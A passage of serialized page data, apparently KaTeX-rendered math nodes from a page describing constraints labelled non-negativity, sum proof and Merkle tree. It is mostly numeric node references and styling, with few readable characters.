21251],[93119],{"type":33,"value":93120},"cco",{"type":28,"tag":116,"props":93122,"children":93124},{"className":93123},[3680,21251],[93125],{"type":33,"value":92922},{"type":28,"tag":116,"props":93127,"children":93129},{"className":93128},[3680,21251],[93130],{"type":33,"value":56022},{"type":28,"tag":116,"props":93132,"children":93134},{"className":93133},[3680,21251],[93135],{"type":33,"value":1554},{"type":28,"tag":116,"props":93137,"children":93139},{"className":93138,"style":92663},[3680],[93140],{"type":33,"value":2754},{"type":28,"tag":116,"props":93142,"children":93144},{"className":93143},[3680,21251],[93145],{"type":33,"value":1413},{"type":28,"tag":116,"props":93147,"children":93150},{"className":93148,"style":93149},[3680,21251],"margin-right:0.03588em;",[93151],{"type":33,"value":93152},"q",{"type":28,"tag":116,"props":93154,"children":93156},{"className":93155},[3680,21251],[93157],{"type":33,"value":92922},{"type":28,"tag":116,"props":93159,"children":93161},{"className":93160},[3680,21251],[93162],{"type":33,"value":3408},{"type":28,"tag":116,"props":93164,"children":93166},{"className":93165},[3680,21251],[93167],{"type":33,"value":1554},{"type":28,"tag":116,"props":93169,"children":93171},{"className":93170},[3680],[93172,93177],{"type":28,"tag":116,"props":93173,"children":93175},{"className":93174,"style":93149},[3680,21251],[93176],{"type":33,"value":2785},{"type":28,"tag":116,"props":93178,"children":93180},{"className":93179},[3695],[93181],{"type":28,"tag":116,"props":93182,"children":93184},{"className":93183},[3700,21305],[93185,93216],{"type":28,"tag":116,"props":93186,"children":93188},{"className":93187},[3705],[93189,93211],{"type":28,"tag":116,"props":93190,"children":93193},{"className":93191,"style":93192},[3710],"height:0.3117em;",[93194],{"type":28,"tag":116,"props":93195,"children":93197},{"style":93196},"top:-2.55em;margin-left:-0.0359em;margin-right:0.05em;",[93198,93202],{"type":28,"tag":116,"props":93199,"children":93201},{"className":93200,"style":3720},[3719],[],{"type":28,"tag":116,"props":93203,"children":93205},{"className":93204},[3725,3726,3727,3728],[93206],{"type":28,"tag":116,"props":93207,"children":93209},{"className":93208},[3680,21251,3728],[93210],{"type":33,"value":3408},{"type":28,"tag":116,"props":93212,"children":93214},{"className":93213},[21407],[93215],{"type":33,"value":21410},{"type":28,"tag":116,"props":93217,"children":93219},{"className":93218},[3705],[93220],{"type":28,"tag":116,"props":93221,"children":93223},{"className":93222,"style":92746},[3710],[93224],{"type":28,"tag":116,"props":93225,"children":93226},{},[],{"type":28,"tag":116,"props":93228,"children":93230},{"className":93229,"style":3857},[3759],[],{"type":28,"tag":116,"props":93232,"children":93234},{"className":93233},[3862],[93235],{"type":33,"value":2340},{"type":28,"tag":116,"props":93237,"children":93239},{"className":93238,"style":3857},[3759],[],{"type":28,"tag":116,"props":93241,"children":93243},{"className":93242},[3669],[93244,93248,93254,93259,93264,93269,93274,93279,93284,93289,93294,93299,93304,93309,93314,93319,93324,93329,93386,93391,93396,93401,93406,93411,93416,93421,93426,93431,93435,93440],{"type":28,"tag":116,"props":93245,"children":93247},{"className":93246,"style":92605},[3674],[],{"type":28,"tag":116,"props":93249,"children":93251},{"className":93250},[3680],[93252],{"type":33,"value":93253},"Σ",{"type":28,"tag":116,"props":93255,"children":93257},{"className":93256},[3759],[93258],{"type":33,"value":21352},{"type":28,"tag":116,"props":93260,"children":93262},{"className":93261},[3680,21251],[93263],{"type":33,"value":87},{"type":28,"tag":116,"props":93265,"children":93267},{"className":93266},[3680,21251],[93268],{"type":33,"value":93120},{"type":28,"tag":116,"props":93270,"children":93272},{"className":93271},[3680,21251],[93273],{"type":33,"value":92922},{"type":28,"tag":116,"props":93275,"children":93277},{"className":93276},[3680,21251],[93278],{"type":33,"value":56022},{"type":28,"tag":116,"props":93280,"children":93282},{"className":93281},[3680,21251],[93283],{"type":33,"value":1554},{"type":28,"tag":116,"props":93285,"children":93287},{"className":93286,"style":92663},[3680],[93288],{"type":33,"value":2754},{"type":28,"tag":116,"props":93290,"children":93292},{"className":93291},[3680,21251],[93293],{"type":33,"value":87},{"type":28,"tag":116,"props":93295,"children":93297},{"className":93296},[3680,21251],[93298],{"type":33,"value":92654},{"type":28,"tag":116,"props":93300,"children":93302},{"className":93301},[3680,21251],[93303],{"type":33,"value":1554},{"type":28,"tag":116,"props":93305,"children":93307},{"className":93306,"style":92663},[3680],[93308],{"type":33,"value":2754},{"type":28,"tag":116,"props":93310,"children":93312},{"className":93311},[3680,21251],[93313],{"type":33,"value":92671},{"type":28,"tag":116,"props":93315,"children":93317},{"className":93316,"style":92675},[3680,21251],[93318],{"type":33,"value":92678},{"type":28,"tag":116,"props":93320,"children":93322},{"className":93321},[3680,21251],[93323],{"type":33,"value":92684},{"type":28,"tag":116,"props":93325,"children":93327},{"className":93326},[3680,21251],[93328],{"type":33,"value":92690},{"type":28,"tag":116,"props":93330,"children":93332},{"className":93331},[3680],[93333,93338],{"type":28,"tag":116,"props":93334,"children":93336},{"className":93335},[3680,21251],[93337],{"type":33,"value":10318},{"type":28,"tag":116,"props":93339,"children":93341},{"className":93340},[3695],[93342],{"type":28,"tag":116,"props":93343,"children":93345},{"className":93344},[3700,21305],[93346,93375],{"type":28,"tag":116,"props":93347,"children":93349},{"className":93348},[3705],[93350,93370],{"type":28,"tag":116,"props":93351,"children":93353},{"className":93352,"style":93192},[3710],[93354],{"type":28,"tag":116,"props":93355,"children":93356},{"style":92719},[93357,93361],{"type":28,"tag":116,"props":93358,"children":93360},{"className":93359,"style":3720},[3719],[],{"type":28,"tag":116,"props":93362,"children":93364},{"className":93363},[3725,3726,3727,3728],[93365],{"type":28,"tag":116,"props":93366,"children":93368},{"className":93367},[3680,21251,3728],[93369],{"type":33,"value":3408},{"type":28,"tag":116,"props":93371,"children":93373},{"className":93372},[21407],[93374],{"type":33,"value":21410},{"type":28,"tag":116,"props":93376,"children":93378},{"className":93377},[3705],[93379],{"type":28,"tag":116,"props":93380,"children":93382},{"className":93381,"style":92746},[3710],[93383],{"type":28,"tag":116,"props":93384,"children":93385},{},[],{"type":28,"tag":116,"props":93387,"children":93389},{"className":93388},[21380],[93390],{"type":33,"value":347},{"type":28,"tag":116,"props":93392,"children":93394},{"className":93393},[3680,21251],[93395],{"type":33,"value":87},{"type":28,"tag":116,"props":93397,"children":93399},{"className":93398},[3680,21251],[93400],{"type":33,"value":92654},{"type":28,"tag":116,"props":93402,"children":93404},{"className":93403},[3680,21251],[93405],{"type":33,"value":1554},{"type":28,"tag":116,"props":93407,"children":93409},{"className":93408,"style":92663},[3680],[93410],{"type":33,"value":2754},{"type":28,"tag":116,"props":93412,"children":93414},{"className":93413},[3680,21251],[93415],{"type":33,"value":56022},{"type":28,"tag":116,"props":93417,"children":93419},{"className":93418},[3680,21251],[93420],{"type":33,"value":92922},{"type":28,"tag":116,"props":93422,"children":93424},{"className":93423},[3680,21251],[93425],{"type":33,"value":50752},{"type":28,"tag":116,"props":93427,"children":93429},{"className":93428},[21401],[93430],{"type":33,"value":15074},{"type":28,"tag":116,"props":93432,"children":93434},{"className":93433,"style":3760},[3759],[],{"type":28,"tag":116,"props":93436,"children":93438},{"className":93437},[3765],[93439],{"type":33,"value":3768},{"type":28,"tag":116,"props":93441,"children":93443},{"className":93442,"style":3760},[3759],[],{"type":28,"tag":116,"props":93445,"children":93447},{"className":93446},[3669],[93448,93452,93457,93462,93467,93472,93477,93483,93488,93494,93499,93504,93509,93514,93519,93524,93529,93534],{"type":28,"tag":116,"props":93449,"children":93451},{"className":93450,"style":92605},[3674],[],{"type":28,"tag":116,"props":93453,"children":93455},{"className":93454},[3680,21251],[93456],{"type":33,"value":87},{"type":28,"tag":116,"props":93458,"children":93460},{"className":93459},[3680,21251],[93461],{"type":33,"value":92654},{"type":28,"tag":116,"props":93463,"children":93465},{"className":93464},[3680,21251],[93466],{"type":33,"value":1554},{"type":28,"tag":116,"props":93468,"children":93470},{"className":93469,"style":92663},[3680],[93471],{"type":33,"value":2754},{"type":28,"tag":116,"props":93473,"children":93475},{"className":93474},[3680,21251],[93476],{"type":33,"value":29},{"type":28,"tag":116,"props":93478,"children":93480},{"className":93479,"style":92663},[3680,21251],[93481],{"type":33,"value":93482},"r",{"type":28,"tag":116,"props":93484,"children":93486},{"className":93485},[3680,21251],[93487],{"type":33,"value":3408},{"type":28,"tag":116,"props":93489,"children":93491},{"className":93490},[3680,21251],[93492],{"type":33,"value":93493},"ces",{"type":28,"tag":116,"props":93495,"children":93497},{"className":93496},[21380],[93498],{"type":33,"value":347},{"type":28,"tag":116,"props":93500,"children":93502},{"className":93501},[3680,21251],[93503],{"type":33,"value":87},{"type":28,"tag":116,"props":93505,"children":93507},{"className":93506},[3680,21251],[93508],{"type":33,"value":92654},{"type":28,"tag":116,"props":93510,"children":93512},{"className":93511},[3680,21251],[93513],{"type":33,"value":1554},{"type":28,"tag":116,"props":93515,"children":93517},{"className":93516,"style":92663},[3680],[93518],{"type":33,"value":2754},{"type":28,"tag":116,"props":93520,"children":93522},{"className":93521},[3680,21251],[93523],{"type":33,"value":56022},{"type":28,"tag":116,"props":93525,"children":93527},{"className":93526},[3680,21251],[93528],{"type":33,"value":92922},{"type":28,"tag":116,"props":93530,"children":93532},{"className":93531},[3680,21251],[93533],{"type":33,"value":50752},{"type":28,"tag":116,"props":93535,"children":93537},{"className":93536},[21401],[93538],{"type":33,"value":15074},{"type":28,"tag":459,"props":93540,"children":93541},{},[93542,93701,93702],{"type":28,"tag":98,"props":93543,"children":93545},{"className":93544},[3652,3653],[93546],{"type":28,"tag":116,"props":93547,"children":93549},{"className":93548},[3658],[93550],{"type":28,"tag":116,"props":93551,"children":93553},{"className":93552,"ariaHidden":3664},[3663],[93554,93687],{"type":28,"tag":116,"props":93555,"children":93557},{"className":93556},[3669],[93558,93562,93567,93572,93577,93582,93587,93592,93597,93602,93607,93612,93617,93674,93678,93683],{"type":28,"tag":116,"props":93559,"children":93561},{"className":93560,"style":93108},[3674],[],{"type":28,"tag":116,"props":93563,"children":93565},{"className":93564},[3680,21251],[93566],{"type":33,"value":87},{"type":28,"tag":116,"props":93568,"children":93570},{"className":93569},[3680,21251],[93571],{"type":33,"value":93120},{"type":28,"tag":116,"props":93573,"children":93575},{"className":93574},[3680,21251],[93576],{"type":33,"value":92922},{"type":28,"tag":116,"props":93578,"children":93580},{"className":93579},[3680,21251],[93581],{"type":33,"value":56022},{"type":28,"tag":116,"props":93583,"children":93585},{"className":93584},[3680,21251],[93586],{"type":33,"value":1554},{"type":28,"tag":116,"props":93588,"children":93590},{"className":93589,"style":92663},[3680],[93591],{"type":33,"value":2754},{"type":28,"tag":116,"props":93593,"children":93595},{"className":93594},[3680,21251],[93596],{"type":33,"value":1413},{"type":28,"tag":116,"props":93598,"children":93600},{"className":93599,"style":93149},[3680,21251],[93601],{"type":33,"value":93152},{"type":28,"tag":116,"props":93603,"children":93605},{"className":93604},[3680,21251],[93606],{"type":33,"value":92922},{"type":28,"tag":116,"props":93608,"children":93610},{"className":93609},[3680,21251],[93611],{"type":33,"value":3408},{"type":28,"tag":116,"props":93613,"children":93615},{"className":93614},[3680,21251],[93616],{"type":33,"value":1554},{"type":28,"tag":116,"props":93618,"children":93620},{"className":93619},[3680],[93621,93626],{"type":28,"tag":116,"props":93622,"children":93624},{"className":93623,"style":93149},[3680,21251],[93625],{"type":33,"value":2785},{"type":28,"tag":116,"props":93627,"children":93629},{"className":93628},[3695],[93630],{"type":28,"tag":116,"props":93631,"children":93633},{"className":93632},[3700,21305],[93634,93663],{"type":28,"tag":116,"props":93635,"children":93637},{"className":93636},[3705],[93638,93658],{"type":28,"tag":116,"props":93639,"children":93641},{"className":93640,"style":93192},[3710],[93642],{"type":28,"tag":116,"props":93643,"children":93644},{"style":93196},[93645,93649],{"type":28,"tag":116,"props":93646,"children":93648},{"className":93647,"style":3720},[3719],[],{"type":28,"tag":116,"props":93650,"children":93652},{"className":93651},[3725,3726,3727,3728],[93653],{"type":28,"tag":116,"props":93654,"children":93656},{"className":93655},[3680,21251,3728],[93657],{"type":33,"value":3408},{"type":28,"tag":116,"props":93659,"children":93661},{"className":93660},[21407],[93662],{"type":33,"value":21410},{"type":28,"tag":116,"props":93664,"children":93666},{"className":93665},[3705],[93667],{"type":28,"tag":116,"props":93668,"children":93670},{"className":93669,"style":92746},[3710],[93671],{"type":28,"tag":116,"props":93672,"children":93673},{},[],{"type":28,"tag":116,"props":93675,"children":93677},{"className":93676,"style":3857},[3759],[],{"type":28,"tag":116,"props":93679,"children":93681},{"className":93680},[3862],[93682],{"type":33,"value":9611},{"type":28,"tag":116,"props":93684,"children":93686},{"className":93685,"style":3857},[3759],[],{"type":28,"tag":116,"props":93688,"children":93690},{"className":93689},[3669],[93691,93696],{"type":28,"tag":116,"props":93692,"children":93695},{"className":93693,"style":93694},[3674],"height:0.6444em;",[],{"type":28,"tag":116,"props":93697,"children":93699},{"className":93698},[3680],[93700],{"type":33,"value":353},{"type":33,"value":6129},{"type":28,"tag":4995,"props":93703,"children":93704},{},[93705],{"type":33,"value":93706},"(non-negativity)",{"type":28,"tag":459,"props":93708,"children":93709},{},[93710,94048,94049],{"type":28,"tag":98,"props":93711,"children":93713},{"className":93712},[3652,3653],[93714],{"type":28,"tag":116,"props":93715,"children":93717},{"className":93716},[3658],[93718],{"type":28,"tag":116,"props":93719,"children":93721},{"className":93720,"ariaHidden":3664},[3663],[93722,93858],{"type":28,"tag":116,"props":93723,"children":93725},{"className":93724},[3669],[93726,93730,93735,93740,93745,93750,93755,93760,93765,93770,93775,93780,93785,93790,93795,93800,93805,93810,93815,93820,93825,93830,93835,93840,93845,93849,93854],{"type":28,"tag":116,"props":93727,"children":93729},{"className":93728,"style":92605},[3674],[],{"type":28,"tag":116,"props":93731,"children":93733},{"className":93732},[3680,21251],[93734],{"type":33,"value":1554},{"type":28,"tag":116,"props":93736,"children":93738},{"className":93737},[3680,21251],[93739],{"type":33,"value":92633},{"type":28,"tag":116,"props":93741,"children":93743},{"className":93742},[3680,21251],[93744],{"type":33,"value":1554},{"type":28,"tag":116,"props":93746,"children":93748},{"className":93747},[3680,21251],[93749],{"type":33,"value":87},{"type":28,"tag":116,"props":93751,"children":93753},{"className":93752,"style":92675},[3680,21251],[93754],{"type":33,"value":92678},{"type":28,"tag":116,"props":93756,"children":93758},{"className":93757,"style":92663},[3680],[93759],{"type":33,"value":2754},{"type":28,"tag":116,"props":93761,"children":93763},{"className":93762},[3680,21251],[93764],{"type":33,"value":87},{"type":28,"tag":116,"props":93766,"children":93768},{"className":93767},[3680,21251],[93769],{"type":33,"value":92654},{"type":28,"tag":116,"props":93771,"children":93773},{"className":93772},[3680,21251],[93774],{"type":33,"value":1554},{"type":28,"tag":116,"props":93776,"children":93778},{"className":93777,"style":92663},[3680],[93779],{"type":33,"value":2754},{"type":28,"tag":116,"props":93781,"children":93783},{"className":93782},[3680,21251],[93784],{"type":33,"value":92671},{"type":28,"tag":116,"props":93786,"children":93788},{"className":93787,"style":92675},[3680,21251],[93789],{"type":33,"value":92678},{"type":28,"tag":116,"props":93791,"children":93793},{"className":93792},[3680,21251],[93794],{"type":33,"value":92684},{"type":28,"tag":116,"props":93796,"children":93798},{"className":93797},[3680,21251],[93799],{"type":33,"value":92690},{"type":28,"tag":116,"props":93801,"children":93803},{"className":93802},[21380],[93804],{"type":33,"value":347},{"type":28,"tag":116,"props":93806,"children":93808},{"className":93807},[3680,21251],[93809],{"type":33,"value":87},{"type":28,"tag":116,"props":93811,"children":93813},{"className":93812},[3680,21251],[93814],{"type":33,"value":92654},{"type":28,"tag":116,"props":93816,"children":93818},{"className":93817},[3680,21251],[93819],{"type":33,"value":1554},{"type":28,"tag":116,"props":93821,"children":93823},{"className":93822,"style":92663},[3680],[93824],{"type":33,"value":2754},{"type":28,"tag":116,"props":93826,"children":93828},{"className":93827},[3680,21251],[93829],{"type":33,"value":56022},{"type":28,"tag":116,"props":93831,"children":93833},{"className":93832},[3680,21251],[93834],{"type":33,"value":92922},{"type":28,"tag":116,"props":93836,"children":93838},{"className":93837},[3680,21251],[93839],{"type":33,"value":50752},{"type":28,"tag":116,"props":93841,"children":93843},{"className":93842},[21401],[93844],{"type":33,"value":15074},{"type":28,"tag":116,"props":93846,"children":93848},{"className":93847,"style":3857},[3759],[],{"type":28,"tag":116,"props":93850,"children":93852},{"className":93851},[3862],[93853],{"type":33,"value":2340},{"type":28,"tag":116,"props":93855,"children":93857},{"className":93856,"style":3857},[3759],[],{"type":28,"tag":116,"props":93859,"children":93861},{"className":93860},[3669],[93862,93866,93871,93876,93881,93886,93891,93896,93901,93906,93911,93916,93921,93926,93931,93936,93941,93946,94003,94008,94013,94018,94023,94028,94033,94038,94043],{"type":28,"tag":116,"props":93863,"children":93865},{"className":93864,"style":92605},[3674],[],{"type":28,"tag":116,"props":93867,"children":93869},{"className":93868},[3680],[93870],{"type":33,"value":93253},{"type":28,"tag":116,"props":93872,"children":93874},{"className":93873},[3759],[93875],{"type":33,"value":21352},{"type":28,"tag":116,"props":93877,"children":93879},{"className":93878},[3680,21251],[93880],{"type":33,"value":87},{"type":28,"tag":116,"props":93882,"children":93884},{"className":93883},[3680,21251],[93885],{"type":33,"value":93120},{"type":28,"tag":116,"props":93887,"children":93889},{"className":93888},[3680,21251],[93890],{"type":33,"value":92922},{"type":28,"tag":116,"props":93892,"children":93894},{"className":93893},[3680,21251],[93895],{"type":33,"value":56022},{"type":28,"tag":116,"props":93897,"children":93899},{"className":93898},[3680,21251],[93900],{"type":33,"value":1554},{"type":28,"tag":116,"props":93902,"children":93904},{"className":93903,"style":92663},[3680],[93905],{"type":33,"value":2754},{"type":28,"tag":116,"props":93907,"children":93909},{"className":93908},[3680,21251],[93910],{"type":33,"value":87},{"type":28,"tag":116,"props":93912,"children":93914},{"className":93913},[3680,21251],[93915],{"type":33,"value":92654},{"type":28,"tag":116,"props":93917,"children":93919},{"className":93918},[3680,21251],[93920],{"type":33,"value":1554},{"type":28,"tag":116,"props":93922,"children":93924},{"className":93923,"style":92663},[3680],[93925],{"type":33,"value":2754},{"type":28,"tag":116,"props":93927,"children":93929},{"className":93928},[3680,21251],[93930],{"type":33,"value":92671},{"type":28,"tag":116,"props":93932,"children":93934},{"className":93933,"style":92675},[3680,21251],[93935],{"type":33,"value":92678},{"type":28,"tag":116,"props":93937,"children":93939},{"className":93938},[3680,21251],[93940],{"type":33,"value":92684},{"type":28,"tag":116,"props":93942,"children":93944},{"className":93943},[3680,21251],[93945],{"type":33,"value":92690},{"type":28,"tag":116,"props":93947,"children":93949},{"className":93948},[3680],[93950,93955],{"type":28,"tag":116,"props":93951,"children":93953},{"className":93952},[3680,21251],[93954],{"type":33,"value":10318},{"type":28,"tag":116,"props":93956,"children":93958},{"className":93957},[3695],[93959],{"type":28,"tag":116,"props":93960,"children":93962},{"className":93961},[3700,21305],[93963,93992],{"type":28,"tag":116,"props":93964,"children":93966},{"className":93965},[3705],[93967,93987],{"type":28,"tag":116,"props":93968,"children":93970},{"className":93969,"style":93192},[3710],[93971],{"type":28,"tag":116,"props":93972,"children":93973},{"style":92719},[93974,93978],{"type":28,"tag":116,"props":93975,"children":93977},{"className":93976,"style":3720},[3719],[],{"type":28,"tag":116,"props":93979,"children":93981},{"className":93980},[3725,3726,3727,3728],[93982],{"type":28,"tag":116,"props":93983,"children":93985},{"className":93984},[3680,21251,3728],[93986],{"type":33,"value":3408},{"type":28,"tag":116,"props":93988,"children":93990},{"className":93989},[21407],[93991],{"type":33,"value":21410},{"type":28,"tag":116,"props":93993,"children":93995},{"className":93994},[3705],[93996],{"type":28,"tag":116,"props":93997,"children":93999},{"className":93998,"style":92746},[3710],[94000],{"type":28,"tag":116,"props":94001,"children":94002},{},[],{"type":28,"tag":116,"props":94004,"children":94006},{"className":94005},[21380],[94007],{"type":33,"value":347},{"type":28,"tag":116,"props":94009,"children":94011},{"className":94010},[3680,21251],[94012],{"type":33,"value":87},{"type":28,"tag":116,"props":94014,"children":94016},{"className":94015},[3680,21251],[94017],{"type":33,"value":92654},{"type":28,"tag":116,"props":94019,"children":94021},{"className":94020},[3680,21251],[94022],{"type":33,"value":1554},{"type":28,"tag":116,"props":94024,"children":94026},{"className":94025,"style":92663},[3680],[94027],{"type":33,"value":2754},{"type":28,"tag":116,"props":94029,"children":94031},{"className":94030},[3680,21251],[94032],{"type":33,"value":56022},{"type":28,"tag":116,"props":94034,"children":94036},{"className":94035},[3680,21251],[94037],{"type":33,"value":92922},{"type":28,"tag":116,"props":94039,"children":94041},{"className":94040},[3680,21251],[94042],{"type":33,"value":50752},{"type":28,"tag":116,"props":94044,"children":94046},{"className":94045},[21401],[94047],{"type":33,"value":15074},{"type":33,"value":6129},{"type":28,"tag":4995,"props":94050,"children":94051},{},[94052],{"type":33,"value":94053},"(sum proof)",{"type":28,"tag":459,"props":94055,"children":94056},{},[94057,94446,94447],{"type":28,"tag":98,"props":94058,"children":94060},{"className":94059},[3652,3653],[94061],{"type":28,"tag":116,"props":94062,"children":94064},{"className":94063},[3658],[94065],{"type":28,"tag":116,"props":94066,"children":94068},{"className":94067,"ariaHidden":3664},[3663],[94069,94155],{"type":28,"tag":116,"props":94070,"children":94072},{"className":94071},[3669],[94073,94078,94083,94089,94095,94100,94105,94110,94115,94121,94126,94132,94137,94142,94146,94151],{"type":28,"tag":116,"props":94074,"children":94077},{"className":94075,"style":94076},[3674],"height:1.0044em;vertical-align:-0.31em;",[],{"type":28,"tag":116,"props":94079,"children":94081},{"className":94080},[3680,21251],[94082],{"type":33,"value":50752},{"type":28,"tag":116,"props":94084,"children":94086},{"className":94085,"style":92663},[3680,21251],[94087],{"type":33,"value":94088},"er",{"type":28,"tag":116,"props":94090,"children":94093},{"className":94091,"style":94092},[3680,21251],"margin-right:0.03148em;",[94094],{"type":33,"value":88302},{"type":28,"tag":116,"props":94096,"children":94098},{"className":94097,"style":92675},[3680,21251],[94099],{"type":33,"value":92678},{"type":28,"tag":116,"props":94101,"children":94103},{"className":94102},[3680,21251],[94104],{"type":33,"value":1413},{"type":28,"tag":116,"props":94106,"children":94108},{"className":94107,"style":92663},[3680],[94109],{"type":33,"value":2754},{"type":28,"tag":116,"props":94111,"children":94113},{"className":94112},[3680,21251],[94114],{"type":33,"value":1554},{"type":28,"tag":116,"props":94116,"children":94118},{"className":94117},[3680,21251],[94119],{"type":33,"value":94120},"ree",{"type":28,"tag":116,"props":94122,"children":94124},{"className":94123,"style":92663},[3680],[94125],{"type":33,"value":2754},{"type":28,"tag":116,"props":94127,"children":94129},{"className":94128},[3680,21251],[94130],{"type":33,"value":94131},"ha",{"type":28,"tag":116,"props":94133,"children":94135},{"className":94134},[3680,21251],[94136],{"type":33,"value":10318},{"type":28,"tag":116,"props":94138,"children":94140},{"className":94139},[3680,21251],[94141],{"type":33,"value":83963},{"type":28,"tag":116,"props":94143,"children":94145},{"className":94144,"style":3857},[3759],[],{"type":28,"tag":116,"props":94147,"children":94149},{"className":94148},[3862],[94150],{"type":33,"value":2340},{"type":28,"tag":116,"props":94152,"children":94154},{"className":94153,"style":3857},[3759],[],{"type":28,"tag":116,"props":94156,"children":94158},{"className":94157},[3669],[94159,94163,94168,94173,94178,94183,94188,94193,94198,94203,94208,94265,94270,94274,94279,94284,94341,94346,94351,94355,94360,94365,94369,94374,94379,94441],{"type":28,"tag":116,"props":94160,"children":94162},{"className":94161,"style":3780},[3674],[],{"type":28,"tag":116,"props":94164,"children":94166},{"className":94165,"style":21252},[3680,21251],[94167],{"type":33,"value":21255},{"type":28,"tag":116,"props":94169,"children":94171},{"className":94170},[3680,21251],[94172],{"type":33,"value":92617},{"type":28,"tag":116,"props":94174,"children":94176},{"className":94175},[3680,21251],[94177],{"type":33,"value":3408},{"type":28,"tag":116,"props":94179,"children":94181},{"className":94180},[3680,21251],[94182],{"type":33,"value":70183},{"type":28,"tag":116,"props":94184,"children":94186},{"className":94185},[3680,21251],[94187],{"type":33,"value":92633},{"type":28,"tag":116,"props":94189,"children":94191},{"className":94190},[3680,21251],[94192],{"type":33,"value":56022},{"type":28,"tag":116,"props":94194,"children":94196},{"className":94195},[21380],[94197],{"type":33,"value":313},{"type":28,"tag":116,"props":94199,"children":94201},{"className":94200},[3680,21251],[94202],{"type":33,"value":94131},{"type":28,"tag":116,"props":94204,"children":94206},{"className":94205},[3680,21251],[94207],{"type":33,"value":10318},{"type":28,"tag":116,"props":94209,"children":94211},{"className":94210},[3680],[94212,94217],{"type":28,"tag":116,"props":94213,"children":94215},{"className":94214},[3680,21251],[94216],{"type":33,"value":83963},{"type":28,"tag":116,"props":94218,"children":94220},{"className":94219},[3695],[94221],{"type":28,"tag":116,"props":94222,"children":94224},{"className":94223},[3700,21305],[94225,94254],{"type":28,"tag":116,"props":94226,"children":94228},{"className":94227},[3705],[94229,94249],{"type":28,"tag":116,"props":94230,"children":94232},{"className":94231,"style":92715},[3710],[94233],{"type":28,"tag":116,"props":94234,"children":94235},{"style":92719},[94236,94240],{"type":28,"tag":116,"props":94237,"children":94239},{"className":94238,"style":3720},[3719],[],{"type":28,"tag":116,"props":94241,"children":94243},{"className":94242},[3725,3726,3727,3728],[94244],{"type":28,"tag":116,"props":94245,"children":94247},{"className":94246},[3680,3728],[94248],{"type":33,"value":353},{"type":28,"tag":116,"props":94250,"children":94252},{"className":94251},[21407],[94253],{"type":33,"value":21410},{"type":28,"tag":116,"props":94255,"children":94257},{"className":94256},[3705],[94258],{"type":28,"tag":116,"props":94259,"children":94261},{"className":94260,"style":92746},[3710],[94262],{"type":28,"tag":116,"props":94263,"children":94264},{},[],{"type":28,"tag":116,"props":94266,"children":94268},{"className":94267},[3791],[94269],{"type":33,"value":3794},{"type":28,"tag":116,"props":94271,"children":94273},{"className":94272,"style":3798},[3759],[],{"type":28,"tag":116,"props":94275,"children":94277},{"className":94276},[3680,21251],[94278],{"type":33,"value":94131},{"type":28,"tag":116,"props":94280,"children":94282},{"className":94281},[3680,21251],[94283],{"type":33,"value":10318},{"type":28,"tag":116,"props":94285,"children":94287},{"className":94286},[3680],[94288,94293],{"type":28,"tag":116,"props":94289,"children":94291},{"className":94290},[3680,21251],[94292],{"type":33,"value":83963},{"type":28,"tag":116,"props":94294,"children":94296},{"className":94295},[3695],[94297],{"type":28,"tag":116,"props":94298,"children":94300},{"className":94299},[3700,21305],[94301,94330],{"type":28,"tag":116,"props":94302,"children":94304},{"className":94303},[3705],[94305,94325],{"type":28,"tag":116,"props":94306,"children":94308},{"className":94307,"style":92715},[3710],[94309],{"type":28,"tag":116,"props":94310,"children":94311},{"style":92719},[94312,94316],{"type":28,"tag":116,"props":94313,"children":94315},{"className":94314,"style":3720},[3719],[],{"type":28,"tag":116,"props":94317,"children":94319},{"className":94318},[3725,3726,3727,3728],[94320],{"type":28,"tag":116,"props":94321,"children":94323},{"className":94322},[3680,3728],[94324],{"type":33,"value":1824},{"type":28,"tag":116,"props":94326,"children":94328},{"className":94327},[21407],[94329],{"type":33,"value":21410},{"type":28,"tag":116,"props":94331,"children":94333},{"className":94332},[3705],[94334],{"type":28,"tag":116,"props":94335,"children":94337},{"className":94336,"style":92746},[3710],[94338],{"type":28,"tag":116,"props":94339,"children":94340},{},[],{"type":28,"tag":116,"props":94342,"children":94344},{"className":94343},[3791],[94345],{"type":33,"value":3794},{"type":28,"tag":116,"props":94347,"children":94349},{"className":94348},[3759],[94350],{"type":33,"value":21352},{"type":28,"tag":116,"props":94352,"children":94354},{"className":94353,"style":3798},[3759],[],{"type":28,"tag":116,"props":94356,"children":94358},{"className":94357},[3680],[94359],{"type":33,"value":9259},{"type":28,"tag":116,"props":94361,"children":94363},{"className":94362},[3791],[94364],{"type":33,"value":3794},{"type":28,"tag":116,"props":94366,"children":94368},{"className":94367,"style":3798},[3759],[],{"type":28,"tag":116,"props":94370,"children":94372},{"className":94371},[3680,21251],[94373],{"type":33,"value":94131},{"type":28,"tag":116,"props":94375,"children":94377},{"className":94376},[3680,21251],[94378],{"type":33,"value":10318},{"type":28,"tag":116,"props":94380,"children":94382},{"className":94381},[3680],[94383,94388],{"type":28,"tag":116,"props":94384,"children":94386},{"className":94385},[3680,21251],[94387],{"type":33,"value":83963},{"type":28,"tag":116,"props":94389,"children":94391},{"className":94390},[3695],[94392],{"type":28,"tag":116,"props":94393,"children":94395},{"className":94394},[3700,21305],[94396,94430],{"type":28,"tag":116,"props":94397,"children":94399},{"className":94398},[3705],[94400,94425],{"type":28,"tag":116,"props":94401,"children":94403},{"className":94402,"style":92715},[3710],[94404],{"type":28,"tag":116,"props":94405,"children":94406},{"style":92719},[94407,94411],{"type":28,"tag":116,"props":94408,"children":94410},{"className":94409,"style":3720},[3719],[],{"type":28,"tag":116,"props":94412,"children":94414},{"className":94413},[3725,3726,3727,3728],[94415],{"type":28,"tag":116,"props":94416,"children":94418},{"className":94417},[3680,3728],[94419],{"type":28,"tag":116,"props":94420,"children":94422},{"className":94421},[3680,3728],[94423],{"type":33,"value":94424},"511",{"type":28,"tag":116,"props":94426,"children":94428},{"className":94427},[21407],[94429],{"type":33,"value":21410},{"type":28,"tag":116,"props":94431,"children":94433},{"className":94432},[3705],[94434],{"type":28,"tag":116,"props":94435,"children":94437},{"className":94436,"style":92746},[3710],[94438],{"type":28,"tag":116,"props":94439,"children":94440},{},[],{"type":28,"tag":116,"props":94442,"children":94444},{"className":94443},[21401],[94445],{"type":33,"value":1829},{"type":33,"value":6129},{"type":28,"tag":4995,"props":94448,"children":94449},{},[94450],{"type":33,"value":94451},"(merkle tree 